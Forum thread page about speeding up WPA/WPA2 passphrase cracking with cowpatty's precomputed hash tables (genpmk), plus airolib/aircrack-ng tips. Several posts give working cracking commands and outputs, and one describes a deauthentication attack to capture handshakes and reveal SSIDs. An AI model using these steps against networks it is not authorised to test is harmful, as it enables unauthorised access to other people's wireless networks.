Page 1 of 8 123 ... LastLast
Results 1 to 10 of 72

Thread: Benefits of Time-Memory Trade-Off in coWPAtty

  1. #1
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default Benefits of Time-Memory Trade-Off in coWPAtty

    Background:
    Known SSID: "Harkonen"
    Captured EAPOL handshake "wpa2.eapol.cap"
    Dictionary file: passwords2.txt (~173,000 words)

    First example, using cowpatty with a known password list. Real-time hash generation:
    Code:
    bt ~ # cowpatty -f passwords2.txt -r wpa2.eapol.cap -s "Harkonen"
    ...
    44.89 passphrases/second
    Second example, first using genpmk to create the hash table ahead of time:
    Code:
    bt ~ # genpmk -f passwords2.txt -d testhash -s "Harkonen"
    And now running cowpatty with the pre-computed hash table:
    Code:
    bt ~ # cowpatty -d testhash -r wpa2.eapol.cap -s "Harkonen"
    ...
    172779 passphrases tested in 2.68 seconds:  64563.39 passphrases/second
    To test 172,779 passphrases at 44.89 passphrases/second would take 64+ minutes. On the other hand, by creating the hash tables ahead of time (approximate time of generation was 30 minutes), I was able to test all 172,779 passphrases in 2.68 seconds. This is an approximate increase of 3+ orders of magnitude!

    (btw, the passphrase was not in the dictionary as I wanted cowpatty to run through all the possibilities).
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  2. #2
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Very interesting thread you got there prez. Very informative. So it took you about 30 minutes to create the hashes...which shaved you off about ...34 minutes...hmmm....interesting.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

  3. #3
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    Really interesting dear Prez98....

    around 35 min for all....it's really short........

    64563.39 passphrases/second... it' really fast.... Nice...
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  4. #4
    Just burned his ISO
    Join Date
    Jul 2007
    Posts
    12

    Default genpmk and the 1mill+ password file?

    This should be in reply to the WPA Brute forcing thread in the specialist>wireless section of the forums, but I'm too noob to post there still.

    Prez mentioned a 1mill+ length password file used to create the hash tables in conjuction with the 1k most common ssid's.

    A couple questions regarding that:

    Would there ever be a situation where the ssid is not known? If we know the ssid and take a day to compile hash tables, wouldn't that be faster than running the hack with 1,000 times the data in the hash list? Or am I misunderstanding the speed at which cowpatty operates a hash table.

    To restate the question more clearly - Would it be faster to use the 40GB hash tables with 1,00 ssid's, or to build a hash table for the single ssid in question?

    Also, is the 1mill+ password file available for download?

    Thank you

    -Ethernull

  5. #5
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default

    Moved to existing thread.
    Quote Originally Posted by Ethernull View Post
    To restate the question more clearly - Would it be faster to use the 40GB hash tables with 1,000 ssid's, or to build a hash table for the single ssid in question?
    Although I haven't tried it myself, based upon the numbers, I suspect that using the hash tables would be considerably faster. That of course assumes that the SSID is among the 1,000 in the list. Also, this assumes that the passphrase is actually in the password file.
    Quote Originally Posted by Ethernull View Post
    Also, is the 1mill+ password file available for download?
    This link should work for you.
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  6. #6
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    well the 2 in conjunction is the best

    i use airolib to maintain an essid / pass sqlite database
    i precompute this table(so when you add a new essid it's 99, xxxx % computed)

    first step is verify if Victim essid is in the list.... if it is launch aircrack in conjonction with database........

    if not in list ..... then add essid to database and recompute the table....
    it's fast(airolib compute at about 100 k/s) because you have only a number of pmk to compute equal to number of passwords in database ....

    then use aircrack with the database.......

    hope it's more clear....
    im french so it's not easy for me to explain something in english......


    for the case you have no ssid , you can do a deaut attack when the client will reconnect you will catch this ssid........

    hope helps
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  7. #7
    Junior Member
    Join Date
    Jul 2006
    Posts
    88

    Default

    does cowpatty only accept eapol.cap file or .cap files too? because when i tried to execute cowpatty to find the passphrase for the WPA-PSK it keep saying the file is corrupt. However, in aircrack i had no problems.

  8. #8
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default

    Quote Originally Posted by Funnyman View Post
    does cowpatty only accept eapol.cap file or .cap files too? because when i tried to execute cowpatty to find the passphrase for the WPA-PSK it keep saying the file is corrupt. However, in aircrack i had no problems.
    The name of the file doesn't matter, as long as it's a standard cap format and it has all four parts of the handshake.
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  9. #9
    Junior Member
    Join Date
    Jul 2006
    Posts
    88

    Default

    Quote Originally Posted by theprez98 View Post
    The name of the file doesn't matter, as long as it's a standard cap format and it has all four parts of the handshake.
    Will when i did the WPA crack, airodump registered a handshake on the top right corner of the konsole with the MAC of the AP.

  10. #10
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Ok..I'm having very similar issues with cowpatty that Funnyman is having, except it says.....

    Code:
    {-=Xploitz=-} ~ # cowpatty -r /root/xploitzpsk-01.cap -d /root/testhash -s "Xploitz Network"
    cowpatty 4.0 - WPA-PSK dictionary attack. <jwright@hasborg.com>
    
    End of pcap capture file, incomplete TKIP four-way exchange.  Try using a
    different capture.
    {-=Xploitz=-} ~ #
    Now this is bullshit cause I do have a 4 way handshake. I verified it through wireshark. And aircrack will accept this xploitzpsk-01.cap when I run it. Aircrack said....

    Code:
    {-=Xploitz=-} ~ # aircrack-ng -w testhash -b 00:18:F8:B5:F2:D6 xploitzpsk-01.cap
    Created thread for id 0.
    Opening xploitzpsk-01.cap
    Read 0 packets.
    
    
                                     Aircrack-ng 1.0 r611
    
    
                       [00:00:02] 108 keys tested (49.50 k/s)
    
    
                           Current passphrase: [*viva-voce\Y
    
    
          Master Key     : 0F EE 88 1C 15 6B 0F 15 C5 58 86 3F 05 73 91 D7
                           96 02 17 6F A1 59 9A AA DA 1C CD 3B 4C D4 CC E0
    
          Transcient Key : 0C D2 41 22 16 37 3F 63 2D 9F FE 6A FE 6F 1A 65
                           A3 98 EE 09 4F 16 74 6F CD E2 12 92 6F B8 AB CF
                           13 1A 86 DE 8C 29 F5 ED A6 0B 49 73 8F 0A C1 11
                           EE 13 9E 35 DC A2 E0 E4 98 8F D7 68 1C 8A 71 22
    
          EAPOL HMAC     : D8 B2 15 53 46 CF A7 2C 52 DC 5C 83 CA 79 74 BD
    
    Passphrase not in dictionnary




    . Now I've tried deauthing myself.... and I've tried catching the handshake without deauthing by powering up my other laptop and connecting to the internet..I KNOW that not deauthing and powering up my laptop WILL CAPTURE the 4 way handshake in ENTIRETY..i verified this in wireshark as well..but heres the catch...if I substitute my xploitzpsk-01.cap with the test one in /pentest/wireless/aircrack-ng/test/wpa2.eapol.cap the ****er (cowpatty) will work!! WTF??? This would suggest that my capture didn't catch the 4-way handshake..but wireshark says I DID when I opened my xploitzpks-01.cap file!! This is very frustrating because aircrack will let me but cowpatty won't. If there was an cowpatty forum Id post my issues there..but its Church of WIFI and I cant access the regular members forums cause I lack membership. Someone..please throw me a bone here!! Something...anything.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

Page 1 of 8 123 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •